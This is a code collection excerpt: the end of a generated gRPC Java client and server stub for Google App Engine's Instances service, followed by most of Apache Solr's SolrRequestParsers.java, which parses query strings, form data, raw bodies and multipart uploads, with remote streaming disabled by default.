io.grpc.stub.StreamObserver<com.google.appengine.v1.Instance> responseObserver) { io.grpc.stub.ClientCalls.asyncUnaryCall( getChannel().newCall(getGetInstanceMethod(), getCallOptions()), request, responseObserver); } /** * * * <pre> * Stops a running instance. * The instance might be automatically recreated based on the scaling settings * of the version. For more information, see "How Instances are Managed" * ([standard environment](https://cloud.google.com/appengine/docs/standard/python/how-instances-are-managed) | * [flexible environment](https://cloud.google.com/appengine/docs/flexible/python/how-instances-are-managed)). * To ensure that instances are not re-created and avoid getting billed, you * can stop all instances within the target version by changing the serving * status of the version to `STOPPED` with the * [`apps.services.versions.patch`](https://cloud.google.com/appengine/docs/admin-api/reference/rest/v1/apps.services.versions/patch) * method. * </pre> */ public void deleteInstance( com.google.appengine.v1.DeleteInstanceRequest request, io.grpc.stub.StreamObserver<com.google.longrunning.Operation> responseObserver) { io.grpc.stub.ClientCalls.asyncUnaryCall( getChannel().newCall(getDeleteInstanceMethod(), getCallOptions()), request, responseObserver); } /** * * * <pre> * Enables debugging on a VM instance. This allows you to use the SSH * command to connect to the virtual machine where the instance lives. * While in "debug mode", the instance continues to serve live traffic. * You should delete the instance when you are done debugging and then * allow the system to take over and determine if another instance * should be started. * Only applicable for instances in App Engine flexible environment. * </pre> */ public void debugInstance( com.google.appengine.v1.DebugInstanceRequest request, io.grpc.stub.StreamObserver<com.google.longrunning.Operation> responseObserver) { io.grpc.stub.ClientCalls.asyncUnaryCall( getChannel().newCall(getDebugInstanceMethod(), getCallOptions()), request, responseObserver); } } /** * A stub to allow clients to do synchronous rpc calls to service Instances. * * <pre> * Manages instances of a version. * </pre> */ public static final class InstancesBlockingV2Stub extends io.grpc.stub.AbstractBlockingStub<InstancesBlockingV2Stub> { private InstancesBlockingV2Stub(io.grpc.Channel channel, io.grpc.CallOptions callOptions) { super(channel, callOptions); } @java.lang.Override protected InstancesBlockingV2Stub build( io.grpc.Channel channel, io.grpc.CallOptions callOptions) { return new InstancesBlockingV2Stub(channel, callOptions); } /** * * * <pre> * Lists the instances of a version. * Tip: To aggregate details about instances over time, see the * [Stackdriver Monitoring API](https://cloud.google.com/monitoring/api/ref_v3/rest/v3/projects.timeSeries/list). * </pre> */ public com.google.appengine.v1.ListInstancesResponse listInstances( com.google.appengine.v1.ListInstancesRequest request) { return io.grpc.stub.ClientCalls.blockingUnaryCall( getChannel(), getListInstancesMethod(), getCallOptions(), request); } /** * * * <pre> * Gets instance information. * </pre> */ public com.google.appengine.v1.Instance getInstance( com.google.appengine.v1.GetInstanceRequest request) { return io.grpc.stub.ClientCalls.blockingUnaryCall( getChannel(), getGetInstanceMethod(), getCallOptions(), request); } /** * * * <pre> * Stops a running instance. * The instance might be automatically recreated based on the scaling settings * of the version. For more information, see "How Instances are Managed" * ([standard environment](https://cloud.google.com/appengine/docs/standard/python/how-instances-are-managed) | * [flexible environment](https://cloud.google.com/appengine/docs/flexible/python/how-instances-are-managed)). * To ensure that instances are not re-created and avoid getting billed, you * can stop all instances within the target version by changing the serving * status of the version to `STOPPED` with the * [`apps.services.versions.patch`](https://cloud.google.com/appengine/docs/admin-api/reference/rest/v1/apps.services.versions/patch) * method. * </pre> */ public com.google.longrunning.Operation deleteInstance( com.google.appengine.v1.DeleteInstanceRequest request) { return io.grpc.stub.ClientCalls.blockingUnaryCall( getChannel(), getDeleteInstanceMethod(), getCallOptions(), request); } /** * * * <pre> * Enables debugging on a VM instance. This allows you to use the SSH * command to connect to the virtual machine where the instance lives. * While in "debug mode", the instance continues to serve live traffic. * You should delete the instance when you are done debugging and then * allow the system to take over and determine if another instance * should be started. * Only applicable for instances in App Engine flexible environment. * </pre> */ public com.google.longrunning.Operation debugInstance( com.google.appengine.v1.DebugInstanceRequest request) { return io.grpc.stub.ClientCalls.blockingUnaryCall( getChannel(), getDebugInstanceMethod(), getCallOptions(), request); } } /** * A stub to allow clients to do limited synchronous rpc calls to service Instances. * * <pre> * Manages instances of a version. * </pre> */ public static final class InstancesBlockingStub extends io.grpc.stub.AbstractBlockingStub<InstancesBlockingStub> { private InstancesBlockingStub(io.grpc.Channel channel, io.grpc.CallOptions callOptions) { super(channel, callOptions); } @java.lang.Override protected InstancesBlockingStub build( io.grpc.Channel channel, io.grpc.CallOptions callOptions) { return new InstancesBlockingStub(channel, callOptions); } /** * * * <pre> * Lists the instances of a version. * Tip: To aggregate details about instances over time, see the * [Stackdriver Monitoring API](https://cloud.google.com/monitoring/api/ref_v3/rest/v3/projects.timeSeries/list). * </pre> */ public com.google.appengine.v1.ListInstancesResponse listInstances( com.google.appengine.v1.ListInstancesRequest request) { return io.grpc.stub.ClientCalls.blockingUnaryCall( getChannel(), getListInstancesMethod(), getCallOptions(), request); } /** * * * <pre> * Gets instance information. * </pre> */ public com.google.appengine.v1.Instance getInstance( com.google.appengine.v1.GetInstanceRequest request) { return io.grpc.stub.ClientCalls.blockingUnaryCall( getChannel(), getGetInstanceMethod(), getCallOptions(), request); } /** * * * <pre> * Stops a running instance. * The instance might be automatically recreated based on the scaling settings * of the version. For more information, see "How Instances are Managed" * ([standard environment](https://cloud.google.com/appengine/docs/standard/python/how-instances-are-managed) | * [flexible environment](https://cloud.google.com/appengine/docs/flexible/python/how-instances-are-managed)). * To ensure that instances are not re-created and avoid getting billed, you * can stop all instances within the target version by changing the serving * status of the version to `STOPPED` with the * [`apps.services.versions.patch`](https://cloud.google.com/appengine/docs/admin-api/reference/rest/v1/apps.services.versions/patch) * method. * </pre> */ public com.google.longrunning.Operation deleteInstance( com.google.appengine.v1.DeleteInstanceRequest request) { return io.grpc.stub.ClientCalls.blockingUnaryCall( getChannel(), getDeleteInstanceMethod(), getCallOptions(), request); } /** * * * <pre> * Enables debugging on a VM instance. This allows you to use the SSH * command to connect to the virtual machine where the instance lives. * While in "debug mode", the instance continues to serve live traffic. * You should delete the instance when you are done debugging and then * allow the system to take over and determine if another instance * should be started. * Only applicable for instances in App Engine flexible environment. * </pre> */ public com.google.longrunning.Operation debugInstance( com.google.appengine.v1.DebugInstanceRequest request) { return io.grpc.stub.ClientCalls.blockingUnaryCall( getChannel(), getDebugInstanceMethod(), getCallOptions(), request); } } /** * A stub to allow clients to do ListenableFuture-style rpc calls to service Instances. * * <pre> * Manages instances of a version. * </pre> */ public static final class InstancesFutureStub extends io.grpc.stub.AbstractFutureStub<InstancesFutureStub> { private InstancesFutureStub(io.grpc.Channel channel, io.grpc.CallOptions callOptions) { super(channel, callOptions); } @java.lang.Override protected InstancesFutureStub build(io.grpc.Channel channel, io.grpc.CallOptions callOptions) { return new InstancesFutureStub(channel, callOptions); } /** * * * <pre> * Lists the instances of a version. * Tip: To aggregate details about instances over time, see the * [Stackdriver Monitoring API](https://cloud.google.com/monitoring/api/ref_v3/rest/v3/projects.timeSeries/list). * </pre> */ public com.google.common.util.concurrent.ListenableFuture< com.google.appengine.v1.ListInstancesResponse> listInstances(com.google.appengine.v1.ListInstancesRequest request) { return io.grpc.stub.ClientCalls.futureUnaryCall( getChannel().newCall(getListInstancesMethod(), getCallOptions()), request); } /** * * * <pre> * Gets instance information. * </pre> */ public com.google.common.util.concurrent.ListenableFuture<com.google.appengine.v1.Instance> getInstance(com.google.appengine.v1.GetInstanceRequest request) { return io.grpc.stub.ClientCalls.futureUnaryCall( getChannel().newCall(getGetInstanceMethod(), getCallOptions()), request); } /** * * * <pre> * Stops a running instance. * The instance might be automatically recreated based on the scaling settings * of the version. For more information, see "How Instances are Managed" * ([standard environment](https://cloud.google.com/appengine/docs/standard/python/how-instances-are-managed) | * [flexible environment](https://cloud.google.com/appengine/docs/flexible/python/how-instances-are-managed)). * To ensure that instances are not re-created and avoid getting billed, you * can stop all instances within the target version by changing the serving * status of the version to `STOPPED` with the * [`apps.services.versions.patch`](https://cloud.google.com/appengine/docs/admin-api/reference/rest/v1/apps.services.versions/patch) * method. * </pre> */ public com.google.common.util.concurrent.ListenableFuture<com.google.longrunning.Operation> deleteInstance(com.google.appengine.v1.DeleteInstanceRequest request) { return io.grpc.stub.ClientCalls.futureUnaryCall( getChannel().newCall(getDeleteInstanceMethod(), getCallOptions()), request); } /** * * * <pre> * Enables debugging on a VM instance. This allows you to use the SSH * command to connect to the virtual machine where the instance lives. * While in "debug mode", the instance continues to serve live traffic. * You should delete the instance when you are done debugging and then * allow the system to take over and determine if another instance * should be started. * Only applicable for instances in App Engine flexible environment. * </pre> */ public com.google.common.util.concurrent.ListenableFuture<com.google.longrunning.Operation> debugInstance(com.google.appengine.v1.DebugInstanceRequest request) { return io.grpc.stub.ClientCalls.futureUnaryCall( getChannel().newCall(getDebugInstanceMethod(), getCallOptions()), request); } } private static final int METHODID_LIST_INSTANCES = 0; private static final int METHODID_GET_INSTANCE = 1; private static final int METHODID_DELETE_INSTANCE = 2; private static final int METHODID_DEBUG_INSTANCE = 3; private static final class MethodHandlers<Req, Resp> implements io.grpc.stub.ServerCalls.UnaryMethod<Req, Resp>, io.grpc.stub.ServerCalls.ServerStreamingMethod<Req, Resp>, io.grpc.stub.ServerCalls.ClientStreamingMethod<Req, Resp>, io.grpc.stub.ServerCalls.BidiStreamingMethod<Req, Resp> { private final AsyncService serviceImpl; private final int methodId; MethodHandlers(AsyncService serviceImpl, int methodId) { this.serviceImpl = serviceImpl; this.methodId = methodId; } @java.lang.Override @java.lang.SuppressWarnings("unchecked") public void invoke(Req request, io.grpc.stub.StreamObserver<Resp> responseObserver) { switch (methodId) { case METHODID_LIST_INSTANCES: serviceImpl.listInstances( (com.google.appengine.v1.ListInstancesRequest) request, (io.grpc.stub.StreamObserver<com.google.appengine.v1.ListInstancesResponse>) responseObserver); break; case METHODID_GET_INSTANCE: serviceImpl.getInstance( (com.google.appengine.v1.GetInstanceRequest) request, (io.grpc.stub.StreamObserver<com.google.appengine.v1.Instance>) responseObserver); break; case METHODID_DELETE_INSTANCE: serviceImpl.deleteInstance( (com.google.appengine.v1.DeleteInstanceRequest) request, (io.grpc.stub.StreamObserver<com.google.longrunning.Operation>) responseObserver); break; case METHODID_DEBUG_INSTANCE: serviceImpl.debugInstance( (com.google.appengine.v1.DebugInstanceRequest) request, (io.grpc.stub.StreamObserver<com.google.longrunning.Operation>) responseObserver); break; default: throw new AssertionError(); } } @java.lang.Override @java.lang.SuppressWarnings("unchecked") public io.grpc.stub.StreamObserver<Req> invoke( io.grpc.stub.StreamObserver<Resp> responseObserver) { switch (methodId) { default: throw new AssertionError(); } } } public static final io.grpc.ServerServiceDefinition bindService(AsyncService service) { return io.grpc.ServerServiceDefinition.builder(getServiceDescriptor()) .addMethod( getListInstancesMethod(), io.grpc.stub.ServerCalls.asyncUnaryCall( new MethodHandlers< com.google.appengine.v1.ListInstancesRequest, com.google.appengine.v1.ListInstancesResponse>( service, METHODID_LIST_INSTANCES))) .addMethod( getGetInstanceMethod(), io.grpc.stub.ServerCalls.asyncUnaryCall( new MethodHandlers< com.google.appengine.v1.GetInstanceRequest, com.google.appengine.v1.Instance>( service, METHODID_GET_INSTANCE))) .addMethod( getDeleteInstanceMethod(), io.grpc.stub.ServerCalls.asyncUnaryCall( new MethodHandlers< com.google.appengine.v1.DeleteInstanceRequest, com.google.longrunning.Operation>(service, METHODID_DELETE_INSTANCE))) .addMethod( getDebugInstanceMethod(), io.grpc.stub.ServerCalls.asyncUnaryCall( new MethodHandlers< com.google.appengine.v1.DebugInstanceRequest, com.google.longrunning.Operation>( service, METHODID_DEBUG_INSTANCE))) .build(); } private abstract static class InstancesBaseDescriptorSupplier implements io.grpc.protobuf.ProtoFileDescriptorSupplier, io.grpc.protobuf.ProtoServiceDescriptorSupplier { InstancesBaseDescriptorSupplier() {} @java.lang.Override public com.google.protobuf.Descriptors.FileDescriptor getFileDescriptor() { return com.google.appengine.v1.AppengineProto.getDescriptor(); } @java.lang.Override public com.google.protobuf.Descriptors.ServiceDescriptor getServiceDescriptor() { return getFileDescriptor().findServiceByName("Instances"); } } private static final class InstancesFileDescriptorSupplier extends InstancesBaseDescriptorSupplier { InstancesFileDescriptorSupplier() {} } private static final class InstancesMethodDescriptorSupplier extends InstancesBaseDescriptorSupplier implements io.grpc.protobuf.ProtoMethodDescriptorSupplier { private final java.lang.String methodName; InstancesMethodDescriptorSupplier(java.lang.String methodName) { this.methodName = methodName; } @java.lang.Override public com.google.protobuf.Descriptors.MethodDescriptor getMethodDescriptor() { return getServiceDescriptor().findMethodByName(methodName); } } private static volatile io.grpc.ServiceDescriptor serviceDescriptor; public static io.grpc.ServiceDescriptor getServiceDescriptor() { io.grpc.ServiceDescriptor result = serviceDescriptor; if (result == null) { synchronized (InstancesGrpc.class) { result = serviceDescriptor; if (result == null) { serviceDescriptor = result = io.grpc.ServiceDescriptor.newBuilder(SERVICE_NAME) .setSchemaDescriptor(new InstancesFileDescriptorSupplier()) .addMethod(getListInstancesMethod()) .addMethod(getGetInstanceMethod()) .addMethod(getDeleteInstanceMethod()) .addMethod(getDebugInstanceMethod()) .build(); } } } return result; } }
apache/solr
35,878
solr/core/src/java/org/apache/solr/servlet/SolrRequestParsers.java
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.solr.servlet; import static org.apache.solr.common.params.CommonParams.PATH; import jakarta.servlet.MultipartConfigElement; import jakarta.servlet.http.HttpServletRequest; import jakarta.servlet.http.Part; import java.io.ByteArrayOutputStream; import java.io.IOException; import java.io.InputStream; import java.lang.invoke.MethodHandles; import java.net.URI; import java.nio.ByteBuffer; import java.nio.charset.CharacterCodingException; import java.nio.charset.Charset; import java.nio.charset.CharsetDecoder; import java.nio.charset.CodingErrorAction; import java.nio.charset.StandardCharsets; import java.nio.file.Path; import java.security.Principal; import java.util.ArrayList; import java.util.Arrays; import java.util.Collection; import java.util.HashMap; import java.util.Iterator; import java.util.List; import java.util.Map; import java.util.Set; import org.apache.commons.io.input.CloseShieldInputStream; import org.apache.lucene.util.IOUtils; import org.apache.solr.api.V2HttpCall; import org.apache.solr.common.SolrException; import org.apache.solr.common.SolrException.ErrorCode; import org.apache.solr.common.params.CommonParams; import org.apache.solr.common.params.MultiMapSolrParams; import org.apache.solr.common.params.SolrParams; import org.apache.solr.common.util.CommandOperation; import org.apache.solr.common.util.ContentStream; import org.apache.solr.common.util.ContentStreamBase; import org.apache.solr.common.util.FastInputStream; import org.apache.solr.common.util.StrUtils; import org.apache.solr.core.CoreContainer; import org.apache.solr.core.RequestHandlers; import org.apache.solr.core.SolrConfig; import org.apache.solr.core.SolrCore; import org.apache.solr.request.SolrQueryRequest; import org.apache.solr.request.SolrQueryRequestBase; import org.apache.solr.util.RTimerTree; import org.slf4j.Logger; import org.slf4j.LoggerFactory; public class SolrRequestParsers { private static final Logger log = LoggerFactory.getLogger(MethodHandles.lookup().lookupClass()); // Should these constants be in a more public place? public static final String MULTIPART = "multipart"; public static final String FORMDATA = "formdata"; public static final String RAW = "raw"; public static final String SIMPLE = "simple"; public static final String STANDARD = "standard"; private static final Charset CHARSET_US_ASCII = StandardCharsets.US_ASCII; public static final String INPUT_ENCODING_KEY = "ie"; private static final byte[] INPUT_ENCODING_BYTES = INPUT_ENCODING_KEY.getBytes(CHARSET_US_ASCII); public static final String REQUEST_TIMER_SERVLET_ATTRIBUTE = "org.apache.solr.RequestTimer"; private final HashMap<String, SolrRequestParser> parsers = new HashMap<>(); private final boolean enableRemoteStreams; private final boolean enableStreamBody; private StandardRequestParser standard; /** * Default instance for e.g. admin requests. Limits to 2 MB uploads and does not allow remote * streams. */ public static final SolrRequestParsers DEFAULT = new SolrRequestParsers(); /** * Pass in an xml configuration. A null configuration will enable everything with maximum values. */ public SolrRequestParsers(SolrConfig globalConfig) { final int multipartUploadLimitKB, formUploadLimitKB; if (globalConfig == null) { multipartUploadLimitKB = formUploadLimitKB = Integer.MAX_VALUE; enableRemoteStreams = false; enableStreamBody = false; } else { multipartUploadLimitKB = globalConfig.getMultipartUploadLimitKB(); formUploadLimitKB = globalConfig.getFormUploadLimitKB(); // security risks; disabled by default enableRemoteStreams = Boolean.getBoolean("solr.requests.streaming.remote.enabled"); enableStreamBody = Boolean.getBoolean("solr.requests.streaming.body.enabled"); // Let this filter take care of /select?xxx format } init(multipartUploadLimitKB, formUploadLimitKB); } private SolrRequestParsers() { enableRemoteStreams = false; enableStreamBody = false; init(Integer.MAX_VALUE, Integer.MAX_VALUE); } private void init(int multipartUploadLimitKB, int formUploadLimitKB) { MultipartRequestParser multi = new MultipartRequestParser(multipartUploadLimitKB); RawRequestParser raw = new RawRequestParser(); FormDataRequestParser formdata = new FormDataRequestParser(formUploadLimitKB); standard = new StandardRequestParser(multi, raw, formdata); // I don't see a need to have this publicly configured just yet // adding it is trivial parsers.put(MULTIPART, multi); parsers.put(FORMDATA, formdata); parsers.put(RAW, raw); parsers.put(SIMPLE, new SimpleRequestParser()); parsers.put(STANDARD, standard); parsers.put("", standard); } private static RTimerTree getRequestTimer(HttpServletRequest req) { final Object reqTimer = req.getAttribute(REQUEST_TIMER_SERVLET_ATTRIBUTE); if (reqTimer != null && reqTimer instanceof RTimerTree) { return ((RTimerTree) reqTimer); } return new RTimerTree(); } public SolrQueryRequest parse(SolrCore core, String path, HttpServletRequest req) throws Exception { SolrRequestParser parser = standard; // TODO -- in the future, we could pick a different parser based on the request // Pick the parser from the request... ArrayList<ContentStream> streams = new ArrayList<>(1); SolrParams params = parser.parseParamsAndFillStreams(req, streams); SolrQueryRequest sreq = buildRequestFrom(core, params, streams, getRequestTimer(req), req, req.getUserPrincipal()); // Handlers and login will want to know the path. If it contains a ':' // the handler could use it for RESTful URLs sreq.getContext().put(PATH, RequestHandlers.normalize(path)); sreq.getContext().put("httpMethod", req.getMethod()); return sreq; } /** For embedded Solr use; not related to HTTP. */ public SolrQueryRequest buildRequestFrom( SolrCore core, SolrParams params, Collection<ContentStream> streams) throws Exception { return buildRequestFrom(core, params, streams, new RTimerTree(), null, null); } public SolrQueryRequest buildRequestFrom( SolrCore core, SolrParams params, Collection<ContentStream> streams, Principal principal) throws Exception { return buildRequestFrom(core, params, streams, new RTimerTree(), null, principal); } private SolrQueryRequest buildRequestFrom( SolrCore core, SolrParams params, Collection<ContentStream> streams, // might be added to but caller shouldn't depend on it RTimerTree requestTimer, final HttpServletRequest req, final Principal principal) // from req, if req was provided, otherwise from elsewhere throws Exception { // ensure streams is non-null and mutable so we can easily add to it if (streams == null) { streams = new ArrayList<>(); } else if (!(streams instanceof ArrayList)) { streams = new ArrayList<>(streams); } // The content type will be applied to all streaming content String contentType = params.get(CommonParams.STREAM_CONTENTTYPE); // Handle anything with a remoteURL String[] strs = params.getParams(CommonParams.STREAM_URL); if (strs != null) { if (!enableRemoteStreams) { throw new SolrException(ErrorCode.BAD_REQUEST, "Remote Streaming is disabled."); } for (final String url : strs) { ContentStreamBase stream = new ContentStreamBase.URLStream(URI.create(url).toURL()); if (contentType != null) { stream.setContentType(contentType); } streams.add(stream); } } // Handle streaming files strs = params.getParams(CommonParams.STREAM_FILE); if (strs != null) { if (!enableRemoteStreams) { throw new SolrException( ErrorCode.BAD_REQUEST, "Remote Streaming is disabled. See https://solr.apache.org/guide/solr/latest/configuration-guide/requestdispatcher.html for help"); } for (final String file : strs) { ContentStreamBase stream = new ContentStreamBase.FileStream(Path.of(file)); if (contentType != null) { stream.setContentType(contentType); } streams.add(stream); } } // Check for streams in the request parameters strs = params.getParams(CommonParams.STREAM_BODY); if (strs != null) { if (!enableStreamBody) { throw new SolrException( ErrorCode.BAD_REQUEST, "Stream Body is disabled. See https://solr.apache.org/guide/solr/latest/configuration-guide/requestdispatcher.html for help"); } for (final String body : strs) { ContentStreamBase stream = new ContentStreamBase.StringStream(body); if (contentType != null) { stream.setContentType(contentType); } streams.add(stream); } } final HttpSolrCall httpSolrCall = req == null ? null : (HttpSolrCall) req.getAttribute(HttpSolrCall.class.getName()); SolrQueryRequestBase q = new SolrQueryRequestBase(core, params, requestTimer) { @Override public Principal getUserPrincipal() { return principal; } @Override public CoreContainer getCoreContainer() { return httpSolrCall != null ? httpSolrCall.cores : super.getCoreContainer(); } @Override public List<CommandOperation> getCommands(boolean validateInput) { if (httpSolrCall != null) { return httpSolrCall.getCommands(validateInput); } return super.getCommands(validateInput); } @Override public Map<String, String> getPathTemplateValues() { if (httpSolrCall != null && httpSolrCall instanceof V2HttpCall) { return ((V2HttpCall) httpSolrCall).getUrlParts(); } return super.getPathTemplateValues(); } @Override public HttpSolrCall getHttpSolrCall() { return httpSolrCall; } }; if (!streams.isEmpty()) { q.setContentStreams(streams); } return q; } private static HttpSolrCall getHttpSolrCall(HttpServletRequest req) { return req == null ? null : (HttpSolrCall) req.getAttribute(HttpSolrCall.class.getName()); } /** Given a url-encoded query string (UTF-8), map it into solr params */ public static MultiMapSolrParams parseQueryString(String queryString) { Map<String, String[]> map = new HashMap<>(); parseQueryString(queryString, map); return new MultiMapSolrParams(map); } /** * Given a url-encoded query string (UTF-8), map it into the given map * * @param queryString as given from URL * @param map place all parameters in this map */ static void parseQueryString(final String queryString, final Map<String, String[]> map) { if (queryString != null && queryString.length() > 0) { try { final int len = queryString.length(); // this input stream emulates to get the raw bytes from the URL as passed to servlet // container, it disallows any byte > 127 and enforces to %-escape them: final InputStream in = new InputStream() { int pos = 0; @Override public int read() { if (pos < len) { final char ch = queryString.charAt(pos); if (ch > 127) { throw new SolrException( ErrorCode.BAD_REQUEST, "URLDecoder: The query string contains a not-%-escaped byte > 127 at position " + pos); } pos++; return ch; } else { return -1; } } }; parseFormDataContent(in, Long.MAX_VALUE, StandardCharsets.UTF_8, map, true); } catch (IOException ioe) { throw new SolrException(ErrorCode.BAD_REQUEST, ioe); } } } /** * Given a url-encoded form from POST content (as InputStream), map it into the given map. The * given InputStream should be buffered! * * @param postContent to be parsed * @param charset to be used to decode resulting bytes after %-decoding * @param map place all parameters in this map */ @SuppressWarnings({"fallthrough", "resource"}) static long parseFormDataContent( final InputStream postContent, final long maxLen, Charset charset, final Map<String, String[]> map, boolean supportCharsetParam) throws IOException { CharsetDecoder charsetDecoder = supportCharsetParam ? null : getCharsetDecoder(charset); final List<Object> buffer = supportCharsetParam ? new ArrayList<>() : null; long len = 0L, keyPos = 0L, valuePos = 0L; final ByteArrayOutputStream keyStream = new ByteArrayOutputStream(), valueStream = new ByteArrayOutputStream(); ByteArrayOutputStream currentStream = keyStream; for (; ; ) { int b = postContent.read(); switch (b) { case -1: // end of stream case '&': // separator if (keyStream.size() > 0) { final byte[] keyBytes = keyStream.toByteArray(), valueBytes = valueStream.toByteArray(); if (Arrays.equals(keyBytes, INPUT_ENCODING_BYTES)) { // we found a charset declaration in the raw bytes if (charsetDecoder != null) { throw new SolrException( ErrorCode.BAD_REQUEST, supportCharsetParam ? ("Query string invalid: duplicate '" + INPUT_ENCODING_KEY + "' (input encoding) key.") : ("Key '" + INPUT_ENCODING_KEY + "' (input encoding) cannot " + "be used in POSTed application/x-www-form-urlencoded form data. " + "To set the input encoding of POSTed form data, use the " + "'Content-Type' header and provide a charset!")); } // decode the charset from raw bytes charset = Charset.forName( decodeChars(valueBytes, keyPos, getCharsetDecoder(CHARSET_US_ASCII))); charsetDecoder = getCharsetDecoder(charset); // finally decode all buffered tokens decodeBuffer(buffer, map, charsetDecoder); } else if (charsetDecoder == null) { // we have no charset decoder until now, buffer the keys / values for later // processing: buffer.add(keyBytes); buffer.add(Long.valueOf(keyPos)); buffer.add(valueBytes); buffer.add(Long.valueOf(valuePos)); } else { // we already have a charsetDecoder, so we can directly decode without buffering: final String key = decodeChars(keyBytes, keyPos, charsetDecoder), value = decodeChars(valueBytes, valuePos, charsetDecoder); MultiMapSolrParams.addParam(key.trim(), value, map); } } else if (valueStream.size() > 0) { throw new SolrException( ErrorCode.BAD_REQUEST, "application/x-www-form-urlencoded invalid: missing key"); } keyStream.reset(); valueStream.reset(); keyPos = valuePos = len + 1; currentStream = keyStream; break; case '+': // space replacement currentStream.write(' '); break; case '%': // escape final int upper = digit16(b = postContent.read()); len++; final int lower = digit16(b = postContent.read()); len++; currentStream.write(((upper << 4) + lower)); break; case '=': // kv separator if (currentStream == keyStream) { valuePos = len + 1; currentStream = valueStream; break; } // fall-through default: currentStream.write(b); } if (b == -1) { break; } len++; if (len > maxLen) { throw new SolrException( ErrorCode.BAD_REQUEST, "application/x-www-form-urlencoded content exceeds upload limit of " + (maxLen / 1024L) + " KB"); } } // if we have not seen a charset declaration, decode the buffer now using the default one (UTF-8 // or given via Content-Type): if (buffer != null && !buffer.isEmpty()) { assert charsetDecoder == null; decodeBuffer(buffer, map, getCharsetDecoder(charset)); } return len; } private static CharsetDecoder getCharsetDecoder(Charset charset) { return charset .newDecoder() .onMalformedInput(CodingErrorAction.REPORT) .onUnmappableCharacter(CodingErrorAction.REPORT); } private static String decodeChars(byte[] bytes, long position, CharsetDecoder charsetDecoder) { try { return charsetDecoder.decode(ByteBuffer.wrap(bytes)).toString(); } catch (CharacterCodingException cce) { throw new SolrException( ErrorCode.BAD_REQUEST, "URLDecoder: Invalid character encoding detected after position " + position + " of query string / form data (while parsing as " + charsetDecoder.charset().name() + ")"); } } private static void decodeBuffer( final List<Object> input, final Map<String, String[]> map, CharsetDecoder charsetDecoder) { for (final Iterator<Object> it = input.iterator(); it.hasNext(); ) { final byte[] keyBytes = (byte[]) it.next(); it.remove(); final Long keyPos = (Long) it.next(); it.remove(); final byte[] valueBytes = (byte[]) it.next(); it.remove(); final Long valuePos = (Long) it.next(); it.remove(); MultiMapSolrParams.addParam( decodeChars(keyBytes, keyPos.longValue(), charsetDecoder).trim(), decodeChars(valueBytes, valuePos.longValue(), charsetDecoder), map); } } private static int digit16(int b) { if (b == -1) { throw new SolrException( ErrorCode.BAD_REQUEST, "URLDecoder: Incomplete trailing escape (%) pattern"); } if (b >= '0' && b <= '9') { return b - '0'; } if (b >= 'A' && b <= 'F') { return b - ('A' - 10); } if (b >= 'a' && b <= 'f') { return b - ('a' - 10); } throw new SolrException( ErrorCode.BAD_REQUEST, "URLDecoder: Invalid digit (" + ((char) b) + ") in escape (%) pattern"); } public boolean isEnableRemoteStreams() { return enableRemoteStreams; } // ----------------------------------------------------------------- // ----------------------------------------------------------------- // I guess we don't really even need the interface, but i'll keep it here just for kicks interface SolrRequestParser { public SolrParams parseParamsAndFillStreams( final HttpServletRequest req, ArrayList<ContentStream> streams) throws Exception; } // ----------------------------------------------------------------- // ----------------------------------------------------------------- /** The simple parser just uses the params directly, does not support POST URL-encoded forms */ static class SimpleRequestParser implements SolrRequestParser { @Override public SolrParams parseParamsAndFillStreams( final HttpServletRequest req, ArrayList<ContentStream> streams) throws Exception { return parseQueryString(req.getQueryString()); } } /** Wrap an HttpServletRequest as a ContentStream */ static class HttpRequestContentStream extends ContentStreamBase { private final InputStream inputStream; public HttpRequestContentStream(HttpServletRequest req, InputStream inputStream) { this.inputStream = inputStream; this.contentType = req.getContentType(); // name = ??? // sourceInfo = ??? String v = req.getHeader("Content-Length"); if (v != null) { size = Long.valueOf(v); } } @Override public InputStream getStream() throws IOException { // we explicitly protect this servlet stream from being closed // so that it does not trip our test assert in our close shield // in SolrDispatchFilter - we must allow closes from getStream // due to the other impls of ContentStream return new CloseShieldInputStream(inputStream); } } /** The raw parser just uses the params directly */ static class RawRequestParser implements SolrRequestParser { // Methods that shouldn't have a body according to HTTP spec private static Set<String> NO_BODY_METHODS = Set.of("GET", "HEAD", "DELETE"); @Override public SolrParams parseParamsAndFillStreams( final HttpServletRequest req, ArrayList<ContentStream> streams) throws Exception { if (req.getContentLengthLong() > 0 || req.getHeader("Transfer-Encoding") != null || !NO_BODY_METHODS.contains(req.getMethod())) { // If Content-Length > 0 OR Transfer-Encoding exists OR // it's a method that can have a body (POST/PUT/PATCH etc) streams.add(new HttpRequestContentStream(req, req.getInputStream())); } return parseQueryString(req.getQueryString()); } } /** Extract Multipart streams */ static class MultipartRequestParser implements SolrRequestParser { private final MultipartConfigElement multipartConfigElement; public MultipartRequestParser(int uploadLimitKB) { multipartConfigElement = new MultipartConfigElement( null, // temp dir (null=default) -1, // maxFileSize (-1=none) uploadLimitKB * 1024L, // maxRequestSize 100 * 1024); // fileSizeThreshold after which will go to disk } @Override public SolrParams parseParamsAndFillStreams( final HttpServletRequest req, ArrayList<ContentStream> streams) throws Exception { if (!isMultipart(req)) { throw new SolrException( ErrorCode.BAD_REQUEST, "Not multipart content! " + req.getContentType()); } // Magic way to tell Jetty dynamically we want multi-part processing. // This is taken from: // https://github.com/eclipse/jetty.project/blob/jetty-10.0.12/jetty-server/src/main/java/org/eclipse/jetty/server/Request.java#L144 req.setAttribute("org.eclipse.jetty.multipartConfig", multipartConfigElement); MultiMapSolrParams params = parseQueryString(req.getQueryString()); // IMPORTANT: the Parts will all have the delete() method called by cleanupMultipartFiles() for (Part part : req.getParts()) { if (part.getSubmittedFileName() == null) { // thus a form field and not file upload // If it's a form field, put it in our parameter map String partAsString = StrUtils.stringFromReader(new PartContentStream(part).getReader()); MultiMapSolrParams.addParam(part.getName().trim(), partAsString, params.getMap()); } else { // file upload streams.add(new PartContentStream(part)); } } return params; } /** Wrap a MultiPart-{@link Part} as a {@link ContentStream} */ static class PartContentStream extends ContentStreamBase { private final Part part; public PartContentStream(Part part) { this.part = part; contentType = part.getContentType(); name = part.getName(); sourceInfo = part.getSubmittedFileName(); 